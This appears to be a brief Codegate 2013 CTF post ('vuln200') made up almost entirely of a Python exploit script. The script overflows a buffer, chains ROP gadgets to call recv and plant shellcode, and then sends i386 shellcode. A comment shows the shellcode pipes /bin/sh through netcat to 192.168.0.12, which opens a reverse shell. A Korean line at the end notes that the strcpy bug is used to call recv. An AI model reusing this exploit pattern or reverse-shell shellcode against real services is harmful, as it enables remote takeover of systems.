[exploit]codegate 2013 vuln200

#!/usr/bin/env python import socket import struct host = '127.0.0.1' port = 7777 p = lambda x: struct.pack("<L", x) recv_plt = 0x8048780 freespace= 0x804b0a0 pppr = 0x08048d35 ppppr = 0x80493ac fd = 8 #shellcode : /bin/sh -c nc 192.168.0.12 555|/bin/sh|nc 192.168.0.12 666 shellcode = "\xeb\x31\x5e\x89\x76\x4f\x8d\x5e\x08\x89\x5e\x53\x8d\x5e\x0b" shellcode +="\x89\x5e\x57\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x4e\x89" shellcode +="\x46\x5b\xb0\x0b\x89\xf3\x8d\x4e\x4f\x8d\x56\x5b\xcd\x80\x31" shellcode +="\xdb\x89\xd8\x40\xcd\x80\xe8\xca\xff\xff\xff\x2f\x62\x69\x6e" shellcode +="\x2f\x73\x68\x20\x2d\x63\x20\x6e\x63\x20\x31\x39\x32\x2e\x31" shellcode +="\x36\x38\x2e\x30\x2e\x31\x32\x20\x35\x35\x35\x7c\x2f\x62\x69\x6e" shellcode +="\x2f\x73\x68\x7c\x6e\x63\x20\x31\x39\x32\x2e\x31\x36\x38\x2e" shellcode +="\x30\x2e\x31\x32\x20\x36\x36\x36" payload = "a" * 0xef payload += p(recv_plt) payload += p(ppppr) payload += p(fd) payload += p(freespace) payload += p(len(shellcode)) payload += p(0) payload += p(freespace) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print s.recv(1024) s.send("write " + payload + '\r\n') print s.recv(1024) s.send(shellcode + '\r\n') s.close()

 

strcpy취약점으로 recv호출

그 후 쉘코드 전송